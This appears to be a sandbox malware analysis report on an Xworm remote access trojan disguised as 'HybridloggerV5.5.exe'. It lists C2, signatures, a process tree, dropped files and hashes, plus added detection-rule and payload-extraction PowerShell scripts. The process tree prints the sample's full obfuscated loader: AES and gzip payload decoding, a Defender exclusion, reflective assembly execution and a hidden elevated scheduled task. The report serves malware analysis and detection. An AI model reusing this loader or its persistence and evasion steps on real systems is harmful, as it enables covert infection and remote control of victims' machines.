Analysis

  • max time kernel
    149s
  • max time network
    146s
  • platform
    windows10-ltsc 2021_x64
  • resource
    win10ltsc2021-20241023-en
  • resource tags
    arch:x64, arch:x86, image:win10ltsc2021-20241023-en, locale:en-us, os:windows10-ltsc 2021-x64, system
  • submitted
    08-11-2024 22:17

General

  • Target

    HybridloggerV5.5.exe

  • Size

    937KB

  • MD5

    c9314841cdbf8522e9ee925039d3bfb7

  • SHA1

    1b851459626862fdae6bdc0dd30aadf7a0f905ee

  • SHA256

    9be892fdf9ada41f19c410d1a6510fda9839fc849dc9a69ff292a6b89fe240e7

  • SHA512

    fb6e8ed3ccae472e19b95f9a1a08968fea7a6457b8d30a35d5f49f466fdf34d321c4cc0d427e753a9063d88456277e8c1d592c5ec1413c96593938b4be778bd0

  • SSDEEP

    24576:61P4yldcwy+Q4sUTB95/MbGkR/ntFdHZknwaIZ1cSsDrM:YP4yj4+Q4sUTB95/MbGkfFdmnwanpM

Malware Config

Extracted

Family

xworm

C2

193.161.193.99:24469

Attributes
  • Install_directory

    %Temp%

  • install_file

    USB.exe

Signatures

  • Detect Xworm Payload 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Runs PowerShell with the display window hidden.

  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up the country code configured in the registry, likely for geofencing.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks processor information in registry 2 TTPs 8 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 6 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 21 IoCs
  • Suspicious use of SendNotifyMessage 20 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
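The behaviours listed above map directly onto process telemetry. The script below is an added example (not part of the report and not the sample's own code) that encodes a few of them as rules over process events: hidden-window PowerShell with an execution-policy bypass, reflective Assembly.Load, an Add-MpPreference exclusion, a Register-ScheduledTask with -RunLevel Highest whose action lives under AppData, wscript.exe running a script from AppData, the `net file` call (commonly used by batch droppers as an is-elevated probe; the report itself only records that net.exe ran) and a chain of timeout.exe delays. It first undoes the reversed-string trick the loader uses to hide .NET member names, so the rules can match the plain names. The sample events are constructed from this report's process tree; the event shape (ProcessId/ParentPid/Image/CommandLine), the rule names and the three-timeout threshold are our own choices.

```powershell
# Added example; not part of the sandbox report or the sample's own code.
# Signature-style rules over process events, run on a constructed event set
# condensed from this report's process tree. Event shape, rule names and the
# timeout threshold are our own assumptions.

# PowerShell's negative range on a string, e.g. ('gnirtS46esaBmorF'[-1..-16] -join ''),
# yields the last N characters in reverse order, so the literal is the real
# member name spelled backwards. Undo it so the rules can match plain names.
function ConvertFrom-ReversedMemberName {
    param([Parameter(Mandatory)] [string] $CommandLine)
    [regex]::Replace($CommandLine, "\('([^']+)'\[-1\.\.-(\d+)\]\s*-join\s*''\)", {
        param($m)
        $text = $m.Groups[1].Value
        $n    = [Math]::Min([int]$m.Groups[2].Value, $text.Length)
        $tail = $text.Substring($text.Length - $n).ToCharArray()
        [array]::Reverse($tail)
        -join $tail
    })
}

# Each rule receives the event and its normalised command line; -match is case-insensitive.
$Rules = [ordered]@{
    ps_hidden_bypass          = { param($e, $c) $e.Image -like '*\powershell.exe' -and
                                  $c -match '-windowstyle\s+hidden' -and $c -match '-e(p|xecutionpolicy)\s+bypass' }
    reflective_assembly_load  = { param($e, $c) $c -match '\[System\.Reflection\.Assembly\]::Load\(' }
    defender_exclusion        = { param($e, $c) $c -match 'Add-MpPreference\s+-ExclusionPath' }
    task_highest_from_appdata = { param($e, $c) $c -match 'Register-ScheduledTask' -and
                                  $c -match '-RunLevel\s+Highest' -and $c -match '\\AppData\\' }
    wscript_from_appdata      = { param($e, $c) $e.Image -like '*\wscript.exe' -and $c -match '\\AppData\\[^"'']*\.(vbs|vbe|js|jse)' }
    # 'net file' fails without elevation, so droppers use it as an "am I admin?" probe; low signal alone.
    net_file_probe            = { param($e, $c) $e.Image -like '*\net.exe' -and $c.Trim() -eq 'net file' }
}

function Invoke-ProcessTriage {
    param([Parameter(Mandatory)] [object[]] $Events, [int] $MinTimeouts = 3)
    $hits = @(foreach ($e in $Events) {
        $c = ConvertFrom-ReversedMemberName $e.CommandLine
        foreach ($name in $Rules.Keys) {
            if (& $Rules[$name] $e $c) {
                [pscustomobject]@{ ProcessId = $e.ProcessId; Rule = $name; Image = $e.Image }
            }
        }
    })
    # Several "timeout /t N" children under one parent is the .bat stage's delay loop (six in this report).
    $chains = $Events | Where-Object { $_.Image -like '*\timeout.exe' -and $_.CommandLine -match '/t\s+\d+' } |
              Group-Object ParentPid | Where-Object Count -ge $MinTimeouts
    $hits += @(foreach ($g in $chains) {
        foreach ($t in $g.Group) { [pscustomobject]@{ ProcessId = $t.ProcessId; Rule = 'timeout_delay_chain'; Image = $t.Image } }
    })
    $hits
}

# Constructed sample, condensed from the process tree in this report.
$PS = 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
$SampleEvents = @(
    [pscustomobject]@{ ProcessId = 4388; ParentPid = 3056; Image = 'C:\Windows\system32\cmd.exe'
                       CommandLine = 'C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "' }
    [pscustomobject]@{ ProcessId = 4040; ParentPid = 4388; Image = 'C:\Windows\system32\timeout.exe'; CommandLine = 'timeout /t 5' }
    [pscustomobject]@{ ProcessId = 4444; ParentPid = 4388; Image = 'C:\Windows\system32\timeout.exe'; CommandLine = 'timeout /t 5' }
    [pscustomobject]@{ ProcessId = 456;  ParentPid = 4388; Image = 'C:\Windows\system32\timeout.exe'; CommandLine = 'timeout /t 23' }
    [pscustomobject]@{ ProcessId = 4596; ParentPid = 1504; Image = 'C:\Windows\system32\net.exe';     CommandLine = 'net file' }
    [pscustomobject]@{ ProcessId = 4816; ParentPid = 1504; Image = $PS
                       CommandLine = "powershell.exe -noprofile -windowstyle hidden -ep bypass -command `$buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]`$param_var); Add-MpPreference -ExclusionPath `$path_var" }
    [pscustomobject]@{ ProcessId = 3680; ParentPid = 4816; Image = $PS
                       CommandLine = "powershell.exe Register-ScheduledTask -TaskName 'RuntimeBroker_startup_27_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_27.vbs') -RunLevel Highest -Force" }
    [pscustomobject]@{ ProcessId = 4124; ParentPid = 4816; Image = 'C:\Windows\System32\WScript.exe'
                       CommandLine = '"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_27.vbs"' }
    [pscustomobject]@{ ProcessId = 2448; ParentPid = 3676; Image = 'C:\Program Files\Mozilla Firefox\firefox.exe'
                       CommandLine = '"C:\Program Files\Mozilla Firefox\firefox.exe"' }
)

Invoke-ProcessTriage -Events $SampleEvents | Sort-Object ProcessId | Format-Table -AutoSize
```

On a live host the same objects can be built from Sysmon Event ID 1 or Security 4688 records and fed to Invoke-ProcessTriage unchanged; the Firefox event is included only to show that an ordinary browser launch matches none of the rules.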

Processes

  • C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe
    "C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.5.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:3056
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4388
      • C:\Windows\system32\chcp.com
        chcp 65001
        3⤵
        PID:4820
      • C:\Windows\system32\findstr.exe
        findstr /C:"hello" banned_users.txt
        3⤵
        PID:3776
      • C:\Windows\system32\findstr.exe
        findstr /C:"hello hello" users.txt
        3⤵
        PID:2032
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:4040
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:4444
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:4944
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:5100
      • C:\Windows\system32\timeout.exe
        timeout /t 23
        3⤵
        • Delays execution with timeout.exe
        PID:456
      • C:\Windows\system32\timeout.exe
        timeout /t 5
        3⤵
        • Delays execution with timeout.exe
        PID:1036
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1504
      • C:\Windows\system32\net.exe
        net file
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4596
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 file
          4⤵
          PID:4280
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4816
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_27_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_27.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3680
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_27.vbs"
          4⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:4124
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_27.bat" "
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:2124
            • C:\Windows\system32\net.exe
              net file
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:1764
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 file
                7⤵
                PID:4148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('WGsJ0QdC6jC+sSlmc6qolg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $HpRNZ=New-Object System.IO.MemoryStream(,$param_var); $zCfEW=New-Object System.IO.MemoryStream; $OjVcm=New-Object System.IO.Compression.GZipStream($HpRNZ, [IO.Compression.CompressionMode]::Decompress); $OjVcm.CopyTo($zCfEW); $OjVcm.Dispose(); $HpRNZ.Dispose(); $zCfEW.Dispose(); $zCfEW.ToArray();}function execute_function($param_var,$param2_var){ $buZKU=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $xpTey=$buZKU.EntryPoint; $xpTey.Invoke($null, $param2_var);}function Add-DefenderExclusion($path_var){ try { Add-MpPreference -ExclusionPath $path_var; } catch { }}$oovly = 'C:\Users\Admin\AppData\Roaming\startup_str_27.bat';$host.UI.RawUI.WindowTitle = $oovly;$ywjFO=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($oovly).Split([Environment]::NewLine);foreach ($ANKGG in $ywjFO) { if ($ANKGG.StartsWith(':: ')) { $oFhCt=$ANKGG.Substring(3); break; }}$payloads_var=[string[]]$oFhCt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));Add-DefenderExclusion $oovly;execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
              6⤵
              • Blocklisted process makes network request
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:2240
  • C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3676
    • C:\Program Files\Mozilla Firefox\firefox.exe
      "C:\Program Files\Mozilla Firefox\firefox.exe"
      2⤵
      • Checks processor information in registry
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:2448
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1972 -parentBuildID 20240401114208 -prefsHandle 1900 -prefMapHandle 1892 -prefsLen 23681 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e8f5b36c-ae9f-4850-bd20-71fd44f9f39d} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" gpu
        3⤵
        PID:2936
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2380 -parentBuildID 20240401114208 -prefsHandle 2372 -prefMapHandle 2368 -prefsLen 23717 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {b2124bcf-23ea-47e0-9749-25071d8640f6} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" socket
        3⤵
        PID:4632
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3180 -childID 1 -isForBrowser -prefsHandle 3172 -prefMapHandle 3168 -prefsLen 23858 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {95f3c159-8573-448b-acdb-dfa62bc60664} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:4296
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3012 -childID 2 -isForBrowser -prefsHandle 2992 -prefMapHandle 3148 -prefsLen 29091 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6595b86b-43a0-403e-89d2-12773f51b1f4} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:4012
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4616 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4596 -prefMapHandle 4536 -prefsLen 29091 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {bd001126-a925-4f55-846c-7099d36f1c68} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" utility
        3⤵
        • Checks processor information in registry
        PID:5028
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5508 -childID 3 -isForBrowser -prefsHandle 5500 -prefMapHandle 5488 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d0d284b2-cbe0-4bc9-947a-d24481fafba1} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:2032
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5668 -childID 4 -isForBrowser -prefsHandle 5624 -prefMapHandle 5524 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {47044437-6688-44f0-9b6b-d31f8564f51a} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:2764
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5928 -childID 5 -isForBrowser -prefsHandle 5848 -prefMapHandle 5856 -prefsLen 27051 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {6862b3f7-1ca8-4b0d-8316-96a8e394ed3c} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:392
      • C:\Program Files\Mozilla Firefox\firefox.exe
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=6388 -childID 6 -isForBrowser -prefsHandle 6380 -prefMapHandle 6368 -prefsLen 27132 -prefMapSize 244658 -jsInitHandle 1060 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {e66b93c4-30b6-43dc-9460-73d1d70488cf} 2448 "\\.\pipe\gecko-crash-server-pipe.2448" tab
        3⤵
        PID:4352
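The two powershell.exe command lines in the tree (PIDs 4816 and 2240) are the same loader with a different carrier path. The reversed-string idiom hides the .NET member names: 'gnirtS46esaBmorF'[-1..-16] -join '' is FromBase64String, 'txeTllAdaeR'[-1..-11] is ReadAllText and 'daoL'[-1..-4] is Load. The loader reads its own .bat, takes the first line that starts with ":: " (a batch comment, so cmd.exe skips it), splits that line on "\" into two base64 blobs, and for each blob runs base64 → AES-CBC with PKCS7 padding (the hard-coded key decodes to 32 bytes and the IV to 16, so AES-256) → gzip → Assembly.Load → EntryPoint.Invoke. Before executing, it calls Add-MpPreference -ExclusionPath on the .bat inside a silent try/catch; that cmdlet only succeeds when elevated, which is consistent with the `net file` call that precedes it. The script below is an added example written for this page, not code from the report or from the sample: it reproduces the decode chain with the same key and IV but writes the two assemblies to disk instead of invoking them. The .bat path, the output directory and the payloadN.bin file names are assumptions.

```powershell
# Added example for this page; not the report's or the sample's own code.
# Reproduces the loader's decode chain (base64 -> AES-CBC -> gzip) with the
# key/IV hard-coded in the observed command and writes the resulting
# assemblies to disk instead of calling their EntryPoint.
# Assumed: $BatPath points at a local copy of HybridloggerV5.bat or
# startup_str_27.bat; the output directory and payloadN.bin names are ours.
param(
    [Parameter(Mandatory)] [string] $BatPath,
    [string] $OutDir = (Join-Path $PWD 'extracted')
)

# Exactly the base64 key (32 bytes, so AES-256) and IV (16 bytes) from the loader.
$Key = [Convert]::FromBase64String('tzbNpPr1z3nGvgbpSokBMPfW5jnpdEOgrRJQ/JKp40o=')
$IV  = [Convert]::FromBase64String('WGsJ0QdC6jC+sSlmc6qolg==')

function Invoke-AesCbcDecrypt([byte[]] $Data) {
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key = $Key
        $aes.IV  = $IV
        $dec = $aes.CreateDecryptor()
        try { return ,$dec.TransformFinalBlock($Data, 0, $Data.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
}

function Expand-GzipBytes([byte[]] $Data) {
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [IO.Compression.CompressionMode]::Decompress)
    try { $gz.CopyTo($out); return ,$out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
}

# The carrier is the first line starting with ':: ' (a batch comment, so cmd.exe
# ignores it); the loader splits it on '\' into one base64 blob per payload.
$carrier = [IO.File]::ReadAllLines($BatPath) | Where-Object { $_.StartsWith(':: ') } | Select-Object -First 1
if (-not $carrier) { throw "no ':: ' carrier line found in $BatPath" }
$blobs = $carrier.Substring(3).Split('\')

New-Item -ItemType Directory -Force -Path $OutDir | Out-Null
for ($i = 0; $i -lt $blobs.Length; $i++) {
    $plain = Expand-GzipBytes (Invoke-AesCbcDecrypt ([Convert]::FromBase64String($blobs[$i])))
    $dst   = Join-Path $OutDir "payload$i.bin"
    [IO.File]::WriteAllBytes($dst, $plain)
    # The loader hands each blob to Assembly.Load, so a managed PE ('MZ') is expected;
    # report the magic and a hash for the analyst's notes.
    $magic = if ($plain.Length -ge 2) { [Text.Encoding]::ASCII.GetString($plain, 0, 2) } else { '' }
    '{0}: {1} bytes, magic={2}, sha256={3}' -f $dst, $plain.Length, $magic, (Get-FileHash -Algorithm SHA256 -Path $dst).Hash
}
```

Run it from an isolated analysis host against a copy of the dropped .bat; it never invokes the decoded assemblies, so the recovered files can go straight to a .NET decompiler for the Xworm configuration.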

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
  Filesize: 3KB
  MD5: 3eb3833f769dd890afc295b977eab4b4
  SHA1: e857649b037939602c72ad003e5d3698695f436f
  SHA256: c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485
  SHA512: c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

• C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  Filesize: 1KB
  MD5: 01d91a150deec836b7c444d4cc323e7a
  SHA1: 8c70d9e38e927d6026d9a94b118b3ecef46a5f2d
  SHA256: 66f51c32062c44f88538dad2b4e50bc3aa932e0ec2b133ad3715fbc91b473862
  SHA512: 8816ec88e0a2706ea299db5afce10b288cd9894e5f54fc9afb3341dc5f05133b09fe51968c8389539fa8fa1534d3348756d2f2e2cf090d057a8f58e42c661637

• C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\dly1kncb.default-release\activity-stream.discovery_stream.json
  Filesize: 22KB
  MD5: 9ab55a9df6a5cfe50fbb290d2fc57185
  SHA1: d5262cea0c05aeea0f81fbcc06295c451c46b75a
  SHA256: 4a633d64505dfb55059d225b868c9f828fb1e5d58fa2621aa4d053c76ceb79b2
  SHA512: d1116cdc3889da43252b9ef6e6300427ad41d42fee5142b028bc0279322a2e52e3b77a1aba84b5c985834586b9aa90cb5f02485734599ad10955ad7684b50f03

• C:\Users\Admin\AppData\Local\Temp\HybridLoggerFixed.bat
  Filesize: 12KB
  MD5: 89a22d3791ca38666c8144725a74497d
  SHA1: 96b672089a3c783e4dd27e8da7c0cc1245d55cfd
  SHA256: 9326ad90526504bfbc876646087bf41a82128fd5d995f624b13ea7ef3e154b94
  SHA512: 6b73d4fde3a673be8ea4aa169382b8aed1577817193545666a18cc83e918a642adf464090f2c1938b0f75f322e8e18e5304bf15c8eda71b4c072aaea5c294b2e

• C:\Users\Admin\AppData\Local\Temp\HybridloggerV5.bat
  Filesize: 910KB
  MD5: 72ecd938d114e246eeebc8ae430fc2e9
  SHA1: 9ece59be22ceadcb3951093483cc69a76658801d
  SHA256: 4eafc8d12d2e402d7de955ffa3940c070d40dea9f2eda1260962518204304f65
  SHA512: d2839e5226f9753f5098072b5cb7ab0f30318f3255355ae69fc75efc0ecfced89eb74788716b01a511e2461fa1c21052a336c1873aa82ef411cb710c4f14059e

• C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s4tszxz5.svk.ps1
  Filesize: 60B
  MD5: d17fe0a3f47be24a6453e9ef58c94641
  SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
  SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
  SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

• C:\Users\Admin\AppData\Local\Temp\users.txt
  Filesize: 14B
  MD5: 352362ce38477524ee1206f2f40db10e
  SHA1: 42866310620b07a48b4e4be1819284d4a9b55922
  SHA256: 355f0bad0f1c510a745fcefe317d87134cb086a838a60b9d3d396cbcab7ad528
  SHA512: 5453ac998cbff1a8a3d6cd76239c7238eb9d16fee97bcd6e676d966a35f0886af8c2a4de3abbc3c50452306832525fea2b71767c6cdc626d27a73b61bed2a87e

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\AlternateServices.bin
  Filesize: 8KB
  MD5: b9e309e63b51a225c01d3d26d82c17fe
  SHA1: df3c6ed043e83433181d3b4ef90849e540ae6d10
  SHA256: 56138b0f2f0618e428f751f75c75196290e14485fe7aa3a5917b5e51e7aa2860
  SHA512: 82490296cc83bc5480bd43c31ef011c965478bd502ef5a84d71025cbb3a412e0f96e1907b37a07394abc758c355763d945dfd6bacde9efa4754638aa183d307c

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\db\data.safe.tmp
  Filesize: 5KB
  MD5: 6b2acda78483e1f6ab7b7f7a634e8b23
  SHA1: 62dfaef3ddc8bce88f5097139829855e6e593651
  SHA256: e255063c1e4518525fad52a5642c5c72442da3654ec4e11e7cb5f34cd6ac2ab9
  SHA512: 227f6ccede371618027b51d8ffa1409b9b0849695a69594e33c2b7a8c1b713b9e5e829ac2989b0ed051934c6b222f402e879452059e2d089686b5c63fa174a43

• C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\dly1kncb.default-release\datareporting\glean\db\data.safe.tmp
  Filesize: 5KB
  MD5: 79a672c3b6971fb38f5af8f672e1e024
  SHA1: 72e375cba1c62223eca1b85977c0f527be413a08
  SHA256: 16b1592ef63d1078c206171cb7b286a086eeaa1d0214749fd31d9c5ba8f5157c
  SHA512: 2f382df1d62e13622f0176f354fa47fec1872d095aa68405e1d48eb3f7e620073885db373f94a030401b22a9d263a9b143124bf883a1e0ec3018fdb5d1e160ee

